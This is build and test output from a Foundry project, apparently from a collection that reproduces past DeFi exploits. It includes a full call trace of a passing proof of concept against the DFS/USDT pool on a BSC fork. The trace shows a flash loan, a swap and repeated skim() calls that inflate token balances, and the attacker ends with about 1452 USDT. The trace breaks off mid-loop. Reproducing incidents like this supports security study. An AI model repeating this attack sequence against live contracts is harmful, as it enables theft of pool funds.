Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.28s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/DFS_exp.sol:59:26:
   |
59 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                          ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/DFS_exp.sol:59:42:
   |
59 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/DFS_exp.sol:59:59:
   |
59 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                                                           ^^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2022-12/DFS_exp.sol:66:38:
   |
66 |         (uint256 reserve0beforeswap, uint256 reserve1beforeswap,) = DFS_USDT_LP.getReserves();
   |                                      ^^^^^^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 509.43ms (1.89ms CPU time)

Ran 1 test for src/test/2022-12/DFS_exp.sol:Attacker
[PASS] testExploit() (gas: 3348218)
Logs:
  [start] Attacker USDT Balance: 0.000000000000000000
  [INFO]  usdt balance : DFS_USDT_LP: 1462.547112307558921470
  [INFO]  Flashloan received 
  [INFO]  this balance (usdt token): 1462.547112307558921470
  [INFO]  this balance (dfs token): 0.000000000000000000
  [INFO]  swapamount : 99.216766548190000120
  [INFO]  dfs balance : address(this): 99.216766548190000120
  [INFO]  dfs balance : address(this): 398265.536438933393348235
  [INFO]  address(this) balance (dfs token): 18021.515523861736049008
  [INFO]  address(this) balance (usdt token): 0.000000000000000000
  [INFO]  address(DFS_USDT_LP) balance (usdt token): 2925.094224615117842940
  [INFO] payback amount usdt : 2922.169130390502725097
  [INFO]  Flashloan payback success 
  [INFO]  usdt balance : this: 1452.309282521406009020
  [End] Attacker USDT Balance: 1452.309282521406009020

Traces:
  [7952] Attacker::setUp()
    ├─ [0] VM::label(pancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "pancakeRouter")
    │   └─ ← [Return]
    ├─ [0] VM::label(USDT_CCDS_LP: [0x2B948B5D3EBe9F463B29280FC03eBcB82db1072F], "USDT_CCDS_LP")
    │   └─ ← [Return]
    ├─ [0] VM::label(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], "DFS_USDT_LP")
    │   └─ ← [Return]
    ├─ [0] VM::label(USDT: [0x55d398326f99059fF775485246999027B3197955], "USDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(dfs: [0x2B806e6D78D8111dd09C58943B9855910baDe005], "dfs")
    │   └─ ← [Return]
    ├─ [0] VM::label(ccds: [0xBFd48CC239bC7e7cd5AD9F9630319F9b59e0B9e1], "ccds")
    │   └─ ← [Return]
    ├─ [0] VM::createSelectFork("bsc", 24349821 [2.434e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [3415718] Attacker::testExploit()
    ├─ [2766483] → new Exploit@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   ├─  storage changes:
    │   │   @ 12: 0 → 1
    │   │   @ 31: 0 → 1
    │   └─ ← [Return] 13596 bytes of code
    ├─ [2531] USDT::balanceOf(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[start] Attacker USDT Balance", val: 0, decimals: 18)
    ├─ [600643] Exploit::harvest()
    │   ├─ [2531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   └─ ← [Return] 1462547112307558921470 [1.462e21]
    │   ├─ emit log_named_decimal_uint(key: "[INFO]  usdt balance : DFS_USDT_LP", val: 1462547112307558921470 [1.462e21], decimals: 18)
    │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   └─ ← [Return] 1462547112307558921470 [1.462e21]
    │   ├─ [563514] USDT_CCDS_LP::swap(1462547112307558921470 [1.462e21], 0, Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 0x30)
    │   │   ├─ [27971] USDT::transfer(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 1462547112307558921470 [1.462e21])
    │   │   │   ├─ emit Transfer(from: USDT_CCDS_LP: [0x2B948B5D3EBe9F463B29280FC03eBcB82db1072F], to: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 1462547112307558921470 [1.462e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x2989ed4234a2d02f7925bbe492a9aca2700384267e62ff0e9fd7d37198cde8d9: 0x0000000000000000000000000000000000000000000a142baf343e6e61cbce61 → 0x0000000000000000000000000000000000000000000a13dc66491cb1b4689963
    │   │   │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0 → 0x00000000000000000000000000000000000000000000004f48eb21bcad6334fe
    │   │   │   └─ ← [Return] true
    │   │   ├─ [493705] Exploit::pancakeCall(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 1462547112307558921470 [1.462e21], 0, 0x30)
    │   │   │   ├─ emit log(val: "[INFO]  Flashloan received ")
    │   │   │   ├─ [531] USDT::balanceOf(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   └─ ← [Return] 1462547112307558921470 [1.462e21]
    │   │   │   ├─ emit log_named_decimal_uint(key: "[INFO]  this balance (usdt token)", val: 1462547112307558921470 [1.462e21], decimals: 18)
    │   │   │   ├─ [2649] dfs::balanceOf(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ emit log_named_decimal_uint(key: "[INFO]  this balance (dfs token)", val: 0, decimals: 18)
    │   │   │   ├─ [6071] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 1462547112307558921470 [1.462e21])
    │   │   │   │   ├─ emit Transfer(from: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 1462547112307558921470 [1.462e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0x00000000000000000000000000000000000000000000004f48eb21bcad6334fe → 0
    │   │   │   │   │   @ 0x53e7603516a46b6143f8557df86f926e66d006cfb1f9ef594032cbdc42629189: 0x00000000000000000000000000000000000000000000004f48eb21bcad6334fe → 0x00000000000000000000000000000000000000000000009e91d643795ac669fc
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2540] DFS_USDT_LP::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 198831195487354709660 [1.988e20], 1462547112307558921470 [1.462e21], 1672339002 [1.672e9]
    │   │   │   ├─ emit log_named_decimal_uint(key: "[INFO]  swapamount ", val: 99216766548190000120 [9.921e19], decimals: 18)
    │   │   │   ├─ [136688] DFS_USDT_LP::swap(99216766548190000120 [9.921e19], 0, Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 0x00)
    │   │   │   │   ├─ [101679] dfs::transfer(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 99216766548190000120 [9.921e19])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 99216766548190000120 [9.921e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x3a8c84d0ca3d791d26d1c558018fafd7edae62a4e71fec8eb7a417cf30564de2: 0 → 1029
    │   │   │   │   │   │   @ 0x759a0d4d3edd1108537a593b654c78917502b7cb5e6648da2891162c8570ea14: 0 → 0x00000000000000000000000000000000000000000000000560e8c380abb973f8
    │   │   │   │   │   │   @ 0x0175b7a638427703f0dbe7bb9bbf987a2551717b34e79f33b5b1008d1fa021be: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   │   │   │   │   @ 11: 1029 → 1030
    │   │   │   │   │   │   @ 0xcee911a2ea82419afffbbd8784199b8969be98a3c894e3c226407ff62e8efc17: 0 → 1
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [1454] Exploit::pancakeCall(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 99216766548190000120 [9.921e19], 0, 0x00)
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 198831195487354709660 [1.988e20]
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ emit Sync(reserve0: 198831195487354709660 [1.988e20], reserve1: 2925094224615117842940 [2.925e21])
    │   │   │   │   ├─ emit Swap(sender: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], amount0In: 99216766548190000120 [9.921e19], amount1In: 1462547112307558921470 [1.462e21], amount0Out: 99216766548190000120 [9.921e19], amount1Out: 0, to: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x00000000000000000000000000000056725955494074204e69df833c84c168fc → 0x0000000000000000000000000000005d115ac366d8a58a6831755bd80e62d513
    │   │   │   │   │   @ 8: 0x63adde3a00000000004f48eb21bcad6334fe00000000000ac7564ed7ca07669c → 0x63aec4a900000000009e91d643795ac669fc00000000000ac7564ed7ca07669c
    │   │   │   │   │   @ 10: 0x000000000000000000000000000000011b94c08a538176536610ca9b9945bc3d → 0x000000000000000000000000000000013ae87e96a8906cd50d375f54aa850725
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [7821] DFS_USDT_LP::sync()
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 198831195487354709660 [1.988e20]
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ emit Sync(reserve0: 198831195487354709660 [1.988e20], reserve1: 2925094224615117842940 [2.925e21])
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [649] dfs::balanceOf(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   └─ ← [Return] 99216766548190000120 [9.921e19]
    │   │   │   ├─ emit log_named_decimal_uint(key: "[INFO]  dfs balance : address(this)", val: 99216766548190000120 [9.921e19], decimals: 18)
    │   │   │   ├─ [649] dfs::balanceOf(Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   └─ ← [Return] 99216766548190000120 [9.921e19]
    │   │   │   ├─ [21784] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 97232431217226200117 [9.723e19])
    │   │   │   │   ├─ emit Transfer(from: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0xc4DE46a5C8fc7f57F07E232b465243A3Da3692f0, value: 486162156086131000 [4.861e17])
    │   │   │   │   ├─ emit Transfer(from: Exploit: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 97232431217226200117 [9.723e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x871836ba62ccb526b85d0b12972d7d0dd5b176eb184e73fddfbb733cffcf83e6: 0x000000000000000000000000000000000000000000000000054729da5c7f4d0c → 0x0000000000000000000000000000000000000000000000000c065bc2153fc644
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x00000000000000000000000000000000000000000000000ac7564ed7ca07669c → 0x0000000000000000000000000000000000000000000000100cb54be020661ad1
    │   │   │   │   │   @ 0x759a0d4d3edd1108537a593b654c78917502b7cb5e6648da2891162c8570ea14: 0x00000000000000000000000000000000000000000000000560e8c380abb973f8 → 0x00000000000000000000000000000000000000000000000014ca94909c9a468b
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [15543] DFS_USDT_LP::skim(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 296063626704580909777 [2.96e20]
    │   │   │   │   ├─ [4083] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 97232431217226200117 [9.723e19])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 97232431217226200117 [9.723e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x0000000000000000000000000000000000000000000000100cb54be020661ad1 → 0x000000000000000000000000000000000000000000000015521448e876c4cf06
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x0000000000000000000000000000000000000000000000100cb54be020661ad1 → 0x000000000000000000000000000000000000000000000015521448e876c4cf06
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [15543] DFS_USDT_LP::skim(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 393296057921807109894 [3.932e20]
    │   │   │   │   ├─ [4083] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 194464862434452400234 [1.944e20])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 194464862434452400234 [1.944e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x000000000000000000000000000000000000000000000015521448e876c4cf06 → 0x00000000000000000000000000000000000000000000001fdcd242f923823770
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x000000000000000000000000000000000000000000000015521448e876c4cf06 → 0x00000000000000000000000000000000000000000000001fdcd242f923823770
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [15543] DFS_USDT_LP::skim(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 587760920356259510128 [5.877e20]
    │   │   │   │   ├─ [4083] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 388929724868904800468 [3.889e20])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 388929724868904800468 [3.889e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x00000000000000000000000000000000000000000000001fdcd242f923823770 → 0x000000000000000000000000000000000000000000000034f24e371a7cfd0844
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x00000000000000000000000000000000000000000000001fdcd242f923823770 → 0x000000000000000000000000000000000000000000000034f24e371a7cfd0844
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [15543] DFS_USDT_LP::skim(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 976690645225164310596 [9.766e20]
    │   │   │   │   ├─ [4083] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 777859449737809600936 [7.778e20])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 777859449737809600936 [7.778e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x000000000000000000000000000000000000000000000034f24e371a7cfd0844 → 0x00000000000000000000000000000000000000000000005f1d461f5d2ff2a9ec
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x000000000000000000000000000000000000000000000034f24e371a7cfd0844 → 0x00000000000000000000000000000000000000000000005f1d461f5d2ff2a9ec
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [15543] DFS_USDT_LP::skim(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1754550094962973911532 [1.754e21]
    │   │   │   │   ├─ [4083] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 1555718899475619201872 [1.555e21])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 1555718899475619201872 [1.555e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x00000000000000000000000000000000000000000000005f1d461f5d2ff2a9ec → 0x0000000000000000000000000000000000000000000000b37335efe295dded3c
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x00000000000000000000000000000000000000000000005f1d461f5d2ff2a9ec → 0x0000000000000000000000000000000000000000000000b37335efe295dded3c
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [15543] DFS_USDT_LP::skim(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 3310268994438593113404 [3.31e21]
    │   │   │   │   ├─ [4083] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 3111437798951238403744 [3.111e21])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 3111437798951238403744 [3.111e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x0000000000000000000000000000000000000000000000b37335efe295dded3c → 0x00000000000000000000000000000000000000000000015c1f1590ed61b473dc
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] USDT::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2925094224615117842940 [2.925e21]
    │   │   │   │   ├─ [3271] USDT::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 0)
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x0000000000000000000000000000000000000000000000b37335efe295dded3c → 0x00000000000000000000000000000000000000000000015c1f1590ed61b473dc
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [15543] DFS_USDT_LP::skim(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1])
    │   │   │   │   ├─ [649] dfs::balanceOf(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 6421706793389831517148 [6.421e21]
    │   │   │   │   ├─ [4083] dfs::transfer(DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], 6222875597902476807488 [6.222e21])
    │   │   │   │   │   ├─ emit Transfer(from: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], to: DFS_USDT_LP: [0x4B02D85E086809eB7AF4E791103Bc4cde83480D1], value: 6222875597902476807488 [6.222e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2e0efeba3230a4d53eb2e5ece7600d671213f1c6ff9b8ee361c94b68de5f3deb: 0x00000000000000000000000000000000000000000000015c1f1590ed61b473dc → 0x0000000000000000000000000000000000000000000002ad76d4d302f961811c
    │   │   │   │   │   └─ ← [Return] true
